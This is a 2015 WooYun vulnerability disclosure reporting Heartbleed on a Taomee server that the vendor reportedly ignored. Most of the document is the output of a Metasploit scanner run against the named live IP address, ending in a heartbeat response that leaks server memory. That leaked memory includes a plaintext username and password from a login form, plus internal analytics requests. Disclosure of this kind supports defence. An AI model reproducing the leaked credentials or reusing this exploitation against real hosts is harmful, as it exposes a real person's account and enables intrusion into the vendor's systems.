
Vulnerability summary (24 followers)

Defect ID: wooyun-2015-0116497

Title: Heartbleed in one of Taomee's (淘米网) systems

Affected vendor: Taomee (淘米网)

Author:

Submitted: 2015-05-27 15:37

Fixed: 2015-06-01 15:38

Published: 2015-06-01 15:38

Vulnerability type: leakage of important sensitive information

Severity: High

Self-assessed rank: 20

Status: vendor was notified of the vulnerability but ignored it

Source: http://www.wooyun.org. For questions or help, contact [email protected]

Tags:



Vulnerability details

Disclosure status:

2015-05-27: details sent to the vendor, awaiting vendor handling
2015-06-01: vendor chose to ignore the vulnerability; details disclosed to the public

Brief description:

*

Detailed description:

Address: https://61.155.182.85/index.php?r=user%2Findex

Scanner output (Metasploit auxiliary module) against the host, showing the TLS handshake and the heartbeat response with leaked memory:

[*] 61.155.182.85:443 - Sending Client Hello...
[!] SSL record #1:
[!] Type: 22
[!] Version: 0x0301
[!] Length: 86
[!] Handshake #1:
[!] Length: 82
[!] Type: Server Hello (2)
[!] Server Hello Version: 0x0301
[!] Server Hello random data: 55656d2dc40e4d89aa442ce7c5952581562a50500c1008b79e70716bae4611d2
[!] Server Hello Session ID length: 32
[!] Server Hello Session ID: 5b1e81eef13e56591868c304518d4bd541cf2353998c304fd70546d581aa80b5
[!] SSL record #2:
[!] Type: 22
[!] Version: 0x0301
[!] Length: 948
[!] Handshake #1:
[!] Length: 944
[!] Type: Certificate Data (11)
[!] Certificates length: 941
[!] Data length: 944
[!] Certificate #1:
[!] Certificate #1: Length: 938
[!] Certificate #1: #<OpenSSL::X509::Certificate subject=#<OpenSSL::X509::Name:0x0000000a5ddab8>, issuer=#<OpenSSL::X509::Name:0x0000000a5dda18>, serial=#<OpenSSL::BN:0x0000000a5dd9a0>, not_before=2014-12-22 10:23:06 UTC, not_after=2019-12-21 10:23:06 UTC>
[!] SSL record #3:
[!] Type: 22
[!] Version: 0x0301
[!] Length: 4
[!] Handshake #1:
[!] Length: 0
[!] Type: Server Hello Done (14)
[*] 61.155.182.85:443 - Sending Client Hello...
[!] SSL record #1:
[!] Type: 22
[!] Version: 0x0301
[!] Length: 86
[!] Handshake #1:
[!] Length: 82
[!] Type: Server Hello (2)
[!] Server Hello Version: 0x0301
[!] Server Hello random data: 55656d38d20a2192519e961771de28fe5b42068bfd450c78ed049b044f4563d9
[!] Server Hello Session ID length: 32
[!] Server Hello Session ID: 2f75d5474b704759be7d896002aa3a371214cadd73cc6e2de3c6a766f89480db
[!] SSL record #2:
[!] Type: 22
[!] Version: 0x0301
[!] Length: 948
[!] Handshake #1:
[!] Length: 944
[!] Type: Certificate Data (11)
[!] Certificates length: 941
[!] Data length: 944
[!] Certificate #1:
[!] Certificate #1: Length: 938
[!] Certificate #1: #<OpenSSL::X509::Certificate subject=#<OpenSSL::X509::Name:0x0000000a1b4a18>, issuer=#<OpenSSL::X509::Name:0x0000000a1b49a0>, serial=#<OpenSSL::BN:0x0000000a1b4928>, not_before=2014-12-22 10:23:06 UTC, not_after=2019-12-21 10:23:06 UTC>
[!] SSL record #3:
[!] Type: 22
[!] Version: 0x0301
[!] Length: 4
[!] Handshake #1:
[!] Length: 0
[!] Type: Server Hello Done (14)
[*] 61.155.182.85:443 - Sending Heartbeat...
[*] 61.155.182.85:443 - Heartbeat response, 46075 bytes
[+] 61.155.182.85:443 - Heartbeat response with leak
[*] 61.155.182.85:443 - Printable info leaked: Ud2pwS-e[;I]f"!98532ED/Am7jPl(sUv {%vaq8k:XfuaIQ.lN+=p!R1B_l.3"L\157>s'E#$GX6t)3thttp/1.1spdy/3.1h2-14uPBfhstbdjl8v17d3uov7Connection: keep-alivePragma: no-cacheCache-Control: no-cacheuser_name=arthurwang&user_pwd=Mogahuli222&vericode=ahIi@YXB'lNm'>z8ode=&loginBtn=%E7%99%BB%E5%BD%95]^6B+(Ay@@hO0RhO0RA+&G+~O0R @H5M$QT\t:fR@O0RO0RRpp`p` pR!jR@ A` wJO0RO0R 00P#0! p6'`( @ 0;.p"0P*P`+@p`0;.p p@)0p0 p Q`! }Z1R0;.@ `q-7' (PZ1R 6'~`f i @ *00#`f#! (@G.@0@ p0#\J%!]%q!#@ pF.`!' @ !#@!@q0@*00 \J%!]%q`00&_u%bw+syU7v_0**0qR![2pA1VWS\J%!]%q0}D~t78ZY/|@2CAGf!GW<k16}OF)>G&HdllsVM?aV%Xn5u>0glK).|C6+zXrLH~V5Z\oVt"e /PBd?u6t"{iiTq/Cb'w0%3Iz=-r@+07&hO0RhO0R`[1R`[1R`[1R0 P# P``!*@#QH#$<JV@r=common%2Fdata%2FgetTimeSeries&average=0&qoq=0&yoy=0&sum=0&data_info%5B0%5D%5Bdata_name%5D=%E6%B4%BB%E8%B7%83%E7%94%A8%E6%88%B7%E6%AC%A1%E5%91%A8%E7%95%99%E5%AD%98%E4%BA%BA%E6%95%B0&data_info%5B0%5D%5Btype%5D=2&data_info%5B0%5D%5Btask_id%5D=22&data_info%5B0%5D%5Brange%5D=1&data_info%5B0%5D%5Bperiod%5D=2&data_info%5B0%5D%5Bfactor%5D=1&data_info%5B0%5D%5Bprecision%5D=0&data_info%5B0%5D%5Bunit%5D=&data_info%5B1%5D%5Bdata_name%5D=%E6%B4%BB%E8%B7%83%E7%94%A8%E6%88%B7%E6%95%B0&data_info%5B1%5D%5Btype%5D=2&data_info%5B1%5D%5Btask_id%5D=10&data_info%5B1%5D%5Brange%5D=&data_info%5B1%5D%5Bfactor%5D=1&data_info%5B1%5D%5Bprecision%5D=0&data_info%5B1%5D%5Bunit%5D=&data_info%5B2%5D%5Bdata_name%5D=%E6%B4%BB%E8%B7%83%E7%94%A8%E6%88%B72%E5%91%A8%E7%95%99%E5%AD%98%E4%BA%BA%E6%95%B0&data_info%5B2%5D%5Btype%5D=2&data_info%5B2%5D%5Btask_id%5D=22&data_info%5B2%5D%5Brange%5D=2&data_info%5B2%5D%5Bperiod%5D=2&data_info%5B2%5D%5Bfactor%5D=1&data_info%5B2%5D%5Bprecision%5D=0&data_info%5B2%5D%5Bunit%5D=&data_info%5B3%5D%5Bdata_name%5D=%E6%B4%BB%E8%B7%83%E7%94%A8%E6%88%B73%E5%91%A8%E7%95%99%E5%AD%98%E4%BA%BA%E6%95%B0&data_info%5B3%5D%5Btype%5D=2&data_info%5B3%5D%5Btask_id%5D=22&data_info%5B3%5D%5Brange%5D=3&data_info%5B3%5D%5Bperiod%5D=2&data_info%5B3%5D%5Bfactor%5D=1&data_info%5B3%5D
%5Bprecision%5D=0&data_info%5B3%5D%5Bunit%5D=&data_info%5B4%5D%5Bdata_name%5D=%E6%B4%BB%E8%B7%83%E7%94%A8%E6%88%B74%E5%91%A8%E7%95%99%E5%AD%98%E4%BA%BA%E6%95%B0&data_info%5B4%5D%5Btype%5D=2&data_info%5B4%5D%5Btask_id%5D=22&data_info%5B4%5D%5Brange%5D=4&data_info%5B4%5D%5Bperiod%5D=2&data_info%5B4%5D%5Bfactor%5D=1&data_info%5B4%5D%5Bprecision%5D=0&data_info%5B4%5D%5Bunit%5D=&data_info%5B5%5D%5Bdata_name%5D=%E6%B4%BB%E8%B7%83%E7%94%A8%E6%88%B75%E5%91%A8%E7%95%99%E5%AD%98%E4%BA%BA%E6%95%B0&data_info%5B5%5D%5Btype%5D=2&data_info%5B5%5D%5Btask_id%5D=22&data_info%5B5%5D%5Brange%5D=5&data_info%5B5%5D%5Bperiod%5D=2&data_info%5B5%5D%5Bfactor%5D=1&data_info%5B5%5D%5Bprecision%5D=0&data_info%5B5%5D%5Bunit%5D=&data_info%5B6%5D%5Bdata_name%5D=%E6%B4%BB%E8%B7%83%E7%94%A8%E6%88%B76%E5%91%A8%E7%95%99%E5%AD%98%E4%BA%BA%E6%95%B0&data_info%5B6%5D%5Btype%5D=2&data_info%5B6%5D%5Btask_id%5D=22&data_info%5B6%5D%5Brange%5D=6&data_info%5B6%5D%5Bperiod%5D=2&data_info%5B6%5D%5Bfactor%5D=1&data_info%5B6%5D%5Bprecision%5D=0&data_info%5B6%5D%5Bunit%5D=&exprs%5B0%5D%5Bdata_name%5D=%E6%B4%BB%E8%B7%83%E7%94%A8%E6%88%B7%E6%AC%A1%E5%91%A8%E7%95%99%E5%AD%98%E7%8E%87&exprs%5B0%5D%5Bunit%5D=%25&exprs%5B0%5D%5Bprecision%5D=2&exprs%5B0%5D%5Bperiod%5D=2&exprs%5B0%5D%5Bexpr%5D=%7B0%7D%2F%7B1%7D*100&exprs%5B1%5D%5Bdata_name%5D=%E6%B4%BB%E8%B7%83%E7%94%A8%E6%88%B72%E5%91%A8%E7%95%99%E5%AD%98%E7%8E%87&exprs%5B1%5D%5Bunit%5D=%25&exprs%5B1%5D%5Bprecision%5D=2&exprs%5B1%5D%5Bperiod%5D=2&exprs%5B1%5D%5Bexpr%5D=%7B2%7D%2F%7B1%7D*100&exprs%5B2%5D%5Bdata_name%5D=%E6%B4%BB%E8%B7%83%E7%94%A8%E6%88%B73%E5%91%A8%E7%95%99%E5%AD%98%E7%8E%87&exprs%5B2%5D%5Bunit%5D=%25&exprs%5B2%5D%5Bprecision%5D=2&exprs%5B2%5D%5Bperiod%5D=2&exprs%5B2%5D%5Bexpr%5D=%7B3%7D%2F%7B1%7D*100&exprs%5B3%5D%5Bdata_name%5D=%E6%B4%BB%E8%B7%83%E7%94%A8%E6%88%B74%E5%91%A8%E7%95%99%E5%AD%98%E7%8E%87&exprs%5B3%5D%5Bunit%5D=%25&exprs%5B3%5D%5Bprecision%5D=2&exprs%5B3%5D%5Bperiod%5D=2&exprs%5B3%5D%5Bexpr%5D=%7B4%7D%2F%7B1%7D*100&exprs%5B4%5D%5Bdata_name%5D=%
E6%B4%BB%E8%B7%83%E7%94%A8%E6%88%B75%E5%91%A8%E7%95%99%E5%AD%98%E7%8E%87&exprs%5B4%5D%5Bunit%5D=%25&exprs%5B4%5D%5Bprecision%5D=2&exprs%5B4%5D%5Bperiod%5D=2&exprs%5B4%5D%5Bexpr%5D=%7B5%7D%2F%7B1%7D*100&exprs%5B5%5D%5Bdata_name%5D=%E6%B4%BB%E8%B7%83%E7%94%A8%E6%88%B76%E5%91%A8%E7%95%99%E5%AD%98%E7%8E%87&exprs%5B5%5D%5Bunit%5D=%25&exprs%5B5%5D%5Bprecision%5D=2&exprs%5B5%5D%5Bperiod%5D=2&exprs%5B5%5D%5Bexpr%5D=%7B6%7D%2F%7B1%7D*100&period=2&from%5B0%5D=2015-03-18&to%5B0%5D=2015-03-18&platform_id=-1&zone_id=-1&server_id=-1&gpzs_id=153&game_id=601TH6nort_type%5D=1&data_info%5B6%5D%5Bdistr_name%5D=%E6%97%A5%E5%9D%877%E6%97%A5%E7%95%99%E5%AD%98%E7%8E%87&data_info%5B6%5D%5Bdimen_name%5D=%E5%B9%B3%E5%8F%B0&data_info%5B6%5D%5Bdistr_by%5D=1&data_info%5B6%5D%5Bdistr_type%5D=3&data_info%5B6%5D%5Bdata%5D=6&data_info%5B6%5D%5Bperiod%5D=1&data_info%5B6%5D%5Bdata_name%5D=%E6%96%B0%E5%A2%9E%E7%94%A8%E6%88%B77%E6%97%A5%E7%95%99%E5%AD%98%E7%8E%87&data_info%5B6%5D%5Btype%5D=2&data_info%5B6%5D%5Btask_id%5D=20&data_info%5B6%5D%5Brange%5D=6&data_info%5B6%5D%5Bfactor%5D=100&data_info%5B6%5D%5Bprecision%5D=2&data_info%5B6%5D%5Bunit%5D=%25&data_info%5B6%5D%5Bcomments%5D=&data_info%5B7%5D%5Bsort_type%5D=1&data_info%5B7%5D%5Bdistr_name%5D=%E6%97%A5%E5%9D%87%E4%BB%98%E8%B4%B9%E7%94%A8%E6%88%B7%E6%95%B0&data_info%5B7%5D%5Bdimen_name%5D=%E5%B9%B3%E5%8F%B0&data_info%5B7%5D%5Bdistr_by%5D=1&data_info%5B7%5D%5Bdistr_type%5D=3&data_info%5B7%5D%5Bdata%5D=7&data_info%5B7%5D%5Bperiod%5D=1&data_info%5B7%5D%5Bdata_name%5D=%E4%BB%98%E8%B4%B9%E7%94%A8%E6%88%B7%E6%95%B0&data_info%5B7%5D%5Btype%5D=1&data_info%5B7%5D%5Bstid%5D=_acpay_&data_info%5B7%5D%5Bsstid%5D=_acpay_&data_info%5B7%5D%5Bop
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

Proof of vulnerability:

As stated in the title (RT).

Remediation:

*

Copyright notice: when reposting, please credit the source @WooYun (乌云)


Vulnerability response

Vendor response:

Severity: no impact, vendor ignored

Ignored at: 2015-06-01 15:38

Vendor reply:

Vulnerability rank: 4 (WooYun assessment)

Latest status:

None yet